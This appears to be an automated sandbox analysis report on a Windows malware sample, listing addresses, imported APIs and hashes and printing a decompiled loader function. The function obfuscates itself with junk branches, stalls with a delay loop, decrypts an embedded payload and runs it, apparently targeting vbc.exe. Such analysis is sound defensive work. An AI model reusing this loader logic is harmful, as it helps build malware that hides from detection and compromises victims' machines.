0x0040259a
0x004025a3
0x004025ac
0x004025b5
0x004025bb
0x004025c1
0x004025c6
0x004025ce
0x004025d7
0x004025d7
0x004025e0
0x004025e6
0x004025ec
0x004025f1
0x004025f9
0x00402602
0x00402602
0x0040260b
0x00402611
0x00402617
0x0040261c
0x00402624
0x0040262d
0x0040262d
0x00402636
0x0040263c
0x00402642
0x00402647
0x0040264f
0x00402658
0x00402658
0x00402661
0x00402667
0x0040266d
0x00402672
0x0040267a
0x00402683
0x00402683
0x0040268c
0x00402695
0x0040269e
0x004026a4
0x004026aa
0x004026af
0x004026b7
0x004026c0
0x004026c0
0x004026c9
0x004026cf
0x004026d5
0x004026da
0x004026e2
0x004026eb
0x004026eb
0x004026f4
0x004026fa
0x00402700
0x00402705
0x0040270d
0x00402716
0x00402716
0x0040271f
0x00402725
0x0040272b
0x00402730
0x00402738
0x00402741
0x00402741
0x0040274a
0x00402750
0x00402756
0x0040275b
0x00402763
0x0040276c
0x0040276c
0x00402775
0x0040277e
0x00402787
0x0040278d
0x00402793
0x00402798
0x004027a0
0x004027a9
0x004027a9
0x004027b2
0x004027b8
0x004027be
0x004027c3
0x004027cb
0x004027d4
0x004027d4
0x004027dd
0x004027e3
0x004027e9
0x004027ee
0x004027f6
0x004027ff
0x004027ff
0x00402808
0x0040280e
0x00402814
0x00402819
0x00402821
0x0040282a
0x0040282a
0x00402833
0x00402839
0x0040283f
0x00402844
0x0040284c
0x00402855
0x00402855
0x00402858
0x0040285c
0x00402860
0x00402864
0x00402868
0x0040286c
0x00402870
0x00402874
0x00402878
0x0040287c
0x00402880
0x00402884
0x00402888
0x0040288c
0x0040289e
0x004028af
0x004028b8
0x004028c1
0x004028cb
0x004028d4
0x004028dd
0x004028e7
0x004028f0
0x004028fa
0x00402903
0x0040290d
0x00402916
0x00402920
0x00402933
0x0040293d
0x00402946
0x0040294f
0x0040289b
0x0040289b
0x00402962
0x00402965
0x0040297a
0x0040298d
0x0040299a

APIs

GetModuleHandleA.KERNEL32(0000003D), ref: 0040295C
GetProcAddress.KERNEL32(?,0000002C), ref: 00402974
VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 0040298D

Strings

+, xrefs: 0040285C
,, xrefs: 00401FFE
3, xrefs: 00402002
=, xrefs: 00402858
-, xrefs: 00402868
4, xrefs: 00402022
8, xrefs: 00402026
5, xrefs: 00402012
?, xrefs: 00402006
', xrefs: 0040287C
:, xrefs: 0040201E
0, xrefs: 0040202A
2, xrefs: 00402016

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID: '$+$,$-$0$2$3$4$5$8$:$=$?
API String ID: 2099061454-2536920922
Opcode ID: ec735675a5624b78d858046d75246a3b81584bd8119b67661729ee8ceaab1420
Instruction ID: f2d674b4812329e8df8546553d5654cfb4636648c3af72cbc9744055478685aa
Opcode Fuzzy Hash: ec735675a5624b78d858046d75246a3b81584bd8119b67661729ee8ceaab1420
Instruction Fuzzy Hash: E1B29D70A49149DFDB008B95FA882EDBF70FB95391F9282A5D5D5360AAC3780172CF1E

Uniqueness

Uniqueness Score: -1.00%

Function 004031C0 Relevance: 8.0, APIs: 2, Strings: 2, Instructions: 1003
sleepCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E004031C0(intOrPtr __edx) {
				intOrPtr _v12;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v44;
				char* _v48;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				long _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				long _v136;
				intOrPtr _v140;
				long _v144;
				intOrPtr _v148;
				signed char _t533;
				intOrPtr _t534;
				void* _t540;
				intOrPtr _t544;

				_t544 = __edx;
				_t533 = FreeConsole(); // executed
				_v48 = L"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe";
				_v76 =  *0x417d10;
				_v76 =  *0x417d0c;
				_v76 =  *0x417d08;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v76 =  *0x417d04;
					_v76 =  *0x417d00;
				}
				_v76 =  *0x417cfc;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v76 =  *0x417cf8;
					_v76 =  *0x417cf4;
				}
				_v76 =  *0x417cf0;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v76 =  *0x417cec;
					_v76 =  *0x417ce8;
				}
				_v76 =  *0x417ce4;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v76 =  *0x417ce0;
					_v76 =  *0x417cdc;
				}
				_v76 =  *0x417cd8;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v76 =  *0x417cd4;
					_v76 =  *0x417cd0;
				}
				_v72 =  *0x417ccc;
				_v72 =  *0x417cc8;
				_v72 =  *0x417cc4;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v72 =  *0x417cc0;
					_v72 =  *0x417cbc;
				}
				_v72 =  *0x417cb8;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v72 =  *0x417cb4;
					_v72 =  *0x417cb0;
				}
				_v72 =  *0x417cac;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v72 =  *0x417ca8;
					_v72 =  *0x417ca4;
				}
				_v72 =  *0x417ca0;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v72 =  *0x417c9c;
					_v72 =  *0x417c98;
				}
				_v72 =  *0x417c94;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v72 =  *0x417c90;
					_v72 =  *0x417c8c;
				}
				_v28 =  *0x417c88;
				_v28 =  *0x417c84;
				_v28 =  *0x417c80;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v28 =  *0x417c7c;
					_v28 =  *0x417c78;
				}
				_v28 =  *0x417c74;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v28 =  *0x417c70;
					_v28 =  *0x417c6c;
				}
				_v28 =  *0x417c68;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v28 =  *0x417c64;
					_v28 =  *0x417c60;
				}
				_v28 =  *0x417c5c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v28 =  *0x417c58;
					_v28 =  *0x417c54;
				}
				_v28 =  *0x417c50;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v28 =  *0x417c4c;
					_v28 =  *0x417c48;
				}
				_v20 =  *0x417c44;
				_v20 =  *0x417c40;
				_v20 =  *0x417c3c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v20 =  *0x417c38;
					_v20 =  *0x417c34;
				}
				_v20 =  *0x417c30;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v20 =  *0x417c2c;
					_v20 =  *0x417c28;
				}
				_v20 =  *0x417c24;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v20 =  *0x417c20;
					_v20 =  *0x417c1c;
				}
				_v20 =  *0x417c18;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v20 =  *0x417c14;
					_v20 =  *0x417c10;
				}
				_v20 =  *0x417c0c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v20 =  *0x417c08;
					_v20 =  *0x417c04;
				}
				_v68 =  *0x417c00;
				_v68 =  *0x417bfc;
				_v68 =  *0x417bf8;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v68 =  *0x417bf4;
					_v68 =  *0x417bf0;
				}
				_v68 =  *0x417bec;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v68 =  *0x417be8;
					_v68 =  *0x417be4;
				}
				_v68 =  *0x417be0;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v68 =  *0x417bdc;
					_v68 =  *0x417bd8;
				}
				_v68 =  *0x417bd4;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v68 =  *0x417bd0;
					_v68 =  *0x417bcc;
				}
				_v68 =  *0x417bc8;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v68 =  *0x417bc4;
					_v68 =  *0x417bc0;
				}
				_v12 =  *0x417bbc;
				_v12 =  *0x417bb8;
				_v12 =  *0x417bb4;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v12 =  *0x417bb0;
					_v12 =  *0x417bac;
				}
				_v12 =  *0x417ba8;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v12 =  *0x417ba4;
					_v12 =  *0x417ba0;
				}
				_v12 =  *0x417b9c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v12 =  *0x417b98;
					_v12 =  *0x417b94;
				}
				_v12 =  *0x417b90;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v12 =  *0x417b8c;
					_v12 =  *0x417b88;
				}
				_v12 =  *0x417b84;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v12 =  *0x417b80;
					_v12 =  *0x417b7c;
				}
				_v44 =  *0x417b78;
				_v44 =  *0x417b74;
				_v44 =  *0x417b70;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v44 =  *0x417b6c;
					_v44 =  *0x417b68;
				}
				_v44 =  *0x417b64;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v44 =  *0x417b60;
					_v44 =  *0x417b5c;
				}
				_v44 =  *0x417b58;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v44 =  *0x417b54;
					_v44 =  *0x417b50;
				}
				_v44 =  *0x417b4c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v44 =  *0x417b48;
					_v44 =  *0x417b44;
				}
				_v44 =  *0x417b40;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v44 =  *0x417b3c;
					_v44 =  *0x417b38;
				}
				_v64 =  *0x417b34;
				_v64 =  *0x417b30;
				_v64 =  *0x417b2c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v64 =  *0x417b28;
					_v64 =  *0x417b24;
				}
				_v64 =  *0x417b20;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v64 =  *0x417b1c;
					_v64 =  *0x417b18;
				}
				_v64 =  *0x417b14;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v64 =  *0x417b10;
					_v64 =  *0x417b0c;
				}
				_v64 =  *0x417b08;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v64 =  *0x417b04;
					_v64 =  *0x417b00;
				}
				_v64 =  *0x417afc;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t533 & 0x00000044) == 0) {
					_v64 =  *0x417af8;
					_v64 =  *0x417af4;
				}
				Sleep(0); // executed
				_v80 = 0;
				_v16 = 0;
				_v16 = 0;
				while(_v16 < 0x2dbb5) {
					_v80 = _v80 + 1;
					_t533 = _v16 + 1;
					_v16 = _t533;
				}
				if(_v80 == 0x2dbb5) {
					_v136 = 0;
					_v100 = 0;
					_v96 = 0x590813;
					_v148 =  *0x417af0;
					_v144 = 0;
					_v120 =  *0x417aec;
					_v120 =  *0x417ae8;
					_v120 =  *0x417ae4;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v120 =  *0x417ae0;
						_v120 =  *0x417adc;
					}
					_v120 =  *0x417ad8;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v120 =  *0x417ad4;
						_v120 =  *0x417ad0;
					}
					_v120 =  *0x417acc;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v120 =  *0x417ac8;
						_v120 =  *0x417ac4;
					}
					_v120 =  *0x417ac0;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v120 =  *0x417abc;
						_v120 =  *0x417ab8;
					}
					_v120 =  *0x417ab4;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v120 =  *0x417ab0;
						_v120 =  *0x417aac;
					}
					_v132 =  *0x417aa8;
					_v132 =  *0x417aa4;
					_v132 =  *0x417aa0;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v132 =  *0x417a9c;
						_v132 =  *0x417a98;
					}
					_v132 =  *0x417a94;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v132 =  *0x417a90;
						_v132 =  *0x417a8c;
					}
					_v132 =  *0x417a88;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v132 =  *0x417a84;
						_v132 =  *0x417a80;
					}
					_v132 =  *0x417a7c;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v132 =  *0x417a78;
						_v132 =  *0x417a74;
					}
					_v132 =  *0x417a70;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v132 =  *0x417a6c;
						_v132 =  *0x417a68;
					}
					_v84 =  *0x417a64;
					_v84 =  *0x417a60;
					_v84 =  *0x417a5c;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v84 =  *0x417a58;
						_v84 =  *0x417a54;
					}
					_v84 =  *0x417a50;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v84 =  *0x417a4c;
						_v84 =  *0x417a48;
					}
					_v84 =  *0x417a44;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v84 =  *0x417a40;
						_v84 =  *0x417a3c;
					}
					_v84 =  *0x417a38;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v84 =  *0x417a34;
						_v84 =  *0x417a30;
					}
					_v84 =  *0x417a2c;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v84 =  *0x417a28;
						_v84 =  *0x417a24;
					}
					_v116 =  *0x417a20;
					_v116 =  *0x417a1c;
					_v116 =  *0x417a18;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v116 =  *0x417a14;
						_v116 =  *0x417a10;
					}
					_v116 =  *0x417a0c;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v116 =  *0x417a08;
						_v116 =  *0x417a04;
					}
					_v116 =  *0x417a00;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v116 =  *0x4179fc;
						_v116 =  *0x4179f8;
					}
					_v116 =  *0x4179f4;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v116 =  *0x4179f0;
						_v116 =  *0x4179ec;
					}
					_v116 =  *0x4179e8;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v116 =  *0x4179e4;
						_v116 =  *0x4179e0;
					}
					_v92 =  *0x4179dc;
					_v92 =  *0x4179d8;
					_v92 =  *0x4179d4;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v92 =  *0x4179d0;
						_v92 =  *0x4179cc;
					}
					_v92 =  *0x4179c8;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v92 =  *0x4179c4;
						_v92 =  *0x4179c0;
					}
					_v92 =  *0x4179bc;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v92 =  *0x4179b8;
						_v92 =  *0x4179b4;
					}
					_v92 =  *0x4179b0;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v92 =  *0x4179ac;
						_v92 =  *0x4179a8;
					}
					_v92 =  *0x4179a4;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v92 =  *0x4179a0;
						_v92 =  *0x41799c;
					}
					_v88 =  *0x417998;
					_v88 =  *0x417994;
					_v88 =  *0x417990;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v88 =  *0x41798c;
						_v88 =  *0x417988;
					}
					_v88 =  *0x417984;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v88 =  *0x417980;
						_v88 =  *0x41797c;
					}
					_v88 =  *0x417978;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v88 =  *0x417974;
						_v88 =  *0x417970;
					}
					_v88 =  *0x41796c;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v88 =  *0x417968;
						_v88 =  *0x417964;
					}
					_v88 =  *0x417960;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v88 =  *0x41795c;
						_v88 =  *0x417958;
					}
					_v128 =  *0x417954;
					_v128 =  *0x417950;
					_v128 =  *0x41794c;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v128 =  *0x417948;
						_v128 =  *0x417944;
					}
					_v128 =  *0x417940;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v128 =  *0x41793c;
						_v128 =  *0x417938;
					}
					_v128 =  *0x417934;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v128 =  *0x417930;
						_v128 =  *0x41792c;
					}
					_v128 =  *0x417928;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v128 =  *0x417924;
						_v128 =  *0x417920;
					}
					_v128 =  *0x41791c;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v128 =  *0x417918;
						_v128 =  *0x417914;
					}
					_v140 =  *0x417910;
					_v140 =  *0x41790c;
					_v140 =  *0x417908;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v140 =  *0x417904;
						_v140 =  *0x417900;
					}
					_v140 =  *0x4178fc;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v140 =  *0x4178f8;
						_v140 =  *0x4178f4;
					}
					_v140 =  *0x4178f0;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v140 =  *0x4178ec;
						_v140 =  *0x4178e8;
					}
					_v140 =  *0x4178e4;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v140 =  *0x4178e0;
						_v140 =  *0x4178dc;
					}
					_v140 =  *0x4178d8;
					asm("fcomp qword [0x417258]");
					asm("fnstsw ax");
					if((_t533 & 0x00000044) == 0) {
						_v140 =  *0x4178d4;
						_v140 =  *0x4178d0;
					}
					_t534 = E004018B0(_t533,  &E0041B008, 0x77e); // executed
					_v108 = _t534;
					_v104 = _t544;
					_v124 = E004029A0(E00401810("tjyRiYjxZQ1atMdbL2um0lScF6f9IoaKt4HlT7B8L9R2pfmf2Q7vrjpXoWNJD1XojUYKYKsgO11CWLvMoRGL6Nocre",  &E0041B008, 0x77e, 0x5b));
					E00401000(_t536, "dwARBDHOT7y9AWBCdgCWx1MkegJdYHYLBE9B4m2r3iK36AcTlJEyeOZDRPKM2ke1oQqkNk2TyajCZ7BRGCHhRMLAEr", 0x41b788, 0x21a00); // executed
					_t540 =  *((intOrPtr*)(_v124 +  &E0041B008))(_v48, 0, 0x41b788, 0x5b); // executed
					return _t540;
				}
				return _t533;
			}

0x004031c0
0x004031c9
0x004031cf
0x004031dc
0x004031e5
0x004031ee
0x004031f4
0x004031fa
0x004031ff
0x00403207
0x00403210
0x00403210
0x00403219
0x0040321f
0x00403225
0x0040322a
0x00403232
0x0040323b
0x0040323b
0x00403244
0x0040324a
0x00403250
0x00403255
0x0040325d
0x00403266
0x00403266
0x0040326f
0x00403275
0x0040327b
0x00403280
0x00403288
0x00403291
0x00403291
0x0040329a
0x004032a0
0x004032a6
0x004032ab
0x004032b3
0x004032bc
0x004032bc
0x004032c5
0x004032ce
0x004032d7
0x004032dd
0x004032e3
0x004032e8
0x004032f0
0x004032f9
0x004032f9
0x00403302
0x00403308
0x0040330e
0x00403313
0x0040331b
0x00403324
0x00403324
0x0040332d
0x00403333
0x00403339
0x0040333e
0x00403346
0x0040334f
0x0040334f
0x00403358
0x0040335e
0x00403364
0x00403369
0x00403371
0x0040337a
0x0040337a
0x00403383
0x00403389
0x0040338f
0x00403394
0x0040339c
0x004033a5
0x004033a5
0x004033ae
0x004033b7
0x004033c0
0x004033c6
0x004033cc
0x004033d1
0x004033d9
0x004033e2
0x004033e2
0x004033eb
0x004033f1
0x004033f7
0x004033fc
0x00403404
0x0040340d
0x0040340d
0x00403416
0x0040341c
0x00403422
0x00403427
0x0040342f
0x00403438
0x00403438
0x00403441
0x00403447
0x0040344d
0x00403452
0x0040345a
0x00403463
0x00403463
0x0040346c
0x00403472
0x00403478
0x0040347d
0x00403485
0x0040348e
0x0040348e
0x00403497
0x004034a0
0x004034a9
0x004034af
0x004034b5
0x004034ba
0x004034c2
0x004034cb
0x004034cb
0x004034d4
0x004034da
0x004034e0
0x004034e5
0x004034ed
0x004034f6
0x004034f6
0x004034ff
0x00403505
0x0040350b
0x00403510
0x00403518
0x00403521
0x00403521
0x0040352a
0x00403530
0x00403536
0x0040353b
0x00403543
0x0040354c
0x0040354c
0x00403555
0x0040355b
0x00403561
0x00403566
0x0040356e
0x00403577
0x00403577
0x00403580
0x00403589
0x00403592
0x00403598
0x0040359e
0x004035a3
0x004035ab
0x004035b4
0x004035b4
0x004035bd
0x004035c3
0x004035c9
0x004035ce
0x004035d6
0x004035df
0x004035df
0x004035e8
0x004035ee
0x004035f4
0x004035f9
0x00403601
0x0040360a
0x0040360a
0x00403613
0x00403619
0x0040361f
0x00403624
0x0040362c
0x00403635
0x00403635
0x0040363e
0x00403644
0x0040364a
0x0040364f
0x00403657
0x00403660
0x00403660
0x00403669
0x00403672
0x0040367b
0x00403681
0x00403687
0x0040368c
0x00403694
0x0040369d
0x0040369d
0x004036a6
0x004036ac
0x004036b2
0x004036b7
0x004036bf
0x004036c8
0x004036c8
0x004036d1
0x004036d7
0x004036dd
0x004036e2
0x004036ea
0x004036f3
0x004036f3
0x004036fc
0x00403702
0x00403708
0x0040370d
0x00403715
0x0040371e
0x0040371e
0x00403727
0x0040372d
0x00403733
0x00403738
0x00403740
0x00403749
0x00403749
0x00403752
0x0040375b
0x00403764
0x0040376a
0x00403770
0x00403775
0x0040377d
0x00403786
0x00403786
0x0040378f
0x00403795
0x0040379b
0x004037a0
0x004037a8
0x004037b1
0x004037b1
0x004037ba
0x004037c0
0x004037c6
0x004037cb
0x004037d3
0x004037dc
0x004037dc
0x004037e5
0x004037eb
0x004037f1
0x004037f6
0x004037fe
0x00403807
0x00403807
0x00403810
0x00403816
0x0040381c
0x00403821
0x00403829
0x00403832
0x00403832
0x0040383b
0x00403844
0x0040384d
0x00403853
0x00403859
0x0040385e
0x00403866
0x0040386f
0x0040386f
0x00403878
0x0040387e
0x00403884
0x00403889
0x00403891
0x0040389a
0x0040389a
0x004038a3
0x004038a9
0x004038af
0x004038b4
0x004038bc
0x004038c5
0x004038c5
0x004038ce
0x004038d4
0x004038da
0x004038df
0x004038e7
0x004038f0
0x004038f0
0x004038f9
0x004038ff
0x00403905
0x0040390a
0x00403912
0x0040391b
0x0040391b
0x00403920
0x00403926
0x0040392d
0x00403934
0x00403946
0x00403955
0x00403940
0x00403943
0x00403943
0x00403961
0x00403967
0x00403971
0x00403978
0x00403985
0x0040398b
0x0040399b
0x004039a4
0x004039ad
0x004039b3
0x004039b9
0x004039be
0x004039c6
0x004039cf
0x004039cf
0x004039d8
0x004039de
0x004039e4
0x004039e9
0x004039f1
0x004039fa
0x004039fa
0x00403a03
0x00403a09
0x00403a0f
0x00403a14
0x00403a1c
0x00403a25
0x00403a25
0x00403a2e
0x00403a34
0x00403a3a
0x00403a3f
0x00403a47
0x00403a50
0x00403a50
0x00403a59
0x00403a5f
0x00403a65
0x00403a6a
0x00403a72
0x00403a7b
0x00403a7b
0x00403a84
0x00403a8d
0x00403a96
0x00403a9c
0x00403aa2
0x00403aa7
0x00403aaf
0x00403ab8
0x00403ab8
0x00403ac1
0x00403ac7
0x00403acd
0x00403ad2
0x00403ada
0x00403ae3
0x00403ae3
0x00403aec
0x00403af2
0x00403af8
0x00403afd
0x00403b05
0x00403b0e
0x00403b0e
0x00403b17
0x00403b1d
0x00403b23
0x00403b28
0x00403b30
0x00403b39
0x00403b39
0x00403b42
0x00403b48
0x00403b4e
0x00403b53
0x00403b5b
0x00403b64
0x00403b64
0x00403b6d
0x00403b76
0x00403b7f
0x00403b85
0x00403b8b
0x00403b90
0x00403b98
0x00403ba1
0x00403ba1
0x00403baa
0x00403bb0
0x00403bb6
0x00403bbb
0x00403bc3
0x00403bcc
0x00403bcc
0x00403bd5
0x00403bdb
0x00403be1
0x00403be6
0x00403bee
0x00403bf7
0x00403bf7
0x00403c00
0x00403c06
0x00403c0c
0x00403c11
0x00403c19
0x00403c22
0x00403c22
0x00403c2b
0x00403c31
0x00403c37
0x00403c3c
0x00403c44
0x00403c4d
0x00403c4d
0x00403c56
0x00403c5f
0x00403c68
0x00403c6e
0x00403c74
0x00403c79
0x00403c81
0x00403c8a
0x00403c8a
0x00403c93
0x00403c99
0x00403c9f
0x00403ca4
0x00403cac
0x00403cb5
0x00403cb5
0x00403cbe
0x00403cc4
0x00403cca
0x00403ccf
0x00403cd7
0x00403ce0
0x00403ce0
0x00403ce9
0x00403cef
0x00403cf5
0x00403cfa
0x00403d02
0x00403d0b
0x00403d0b
0x00403d14
0x00403d1a
0x00403d20
0x00403d25
0x00403d2d
0x00403d36
0x00403d36
0x00403d3f
0x00403d48
0x00403d51
0x00403d57
0x00403d5d
0x00403d62
0x00403d6a
0x00403d73
0x00403d73
0x00403d7c
0x00403d82
0x00403d88
0x00403d8d
0x00403d95
0x00403d9e
0x00403d9e
0x00403da7
0x00403dad
0x00403db3
0x00403db8
0x00403dc0
0x00403dc9
0x00403dc9
0x00403dd2
0x00403dd8
0x00403dde
0x00403de3
0x00403deb
0x00403df4
0x00403df4
0x00403dfd
0x00403e03
0x00403e09
0x00403e0e
0x00403e16
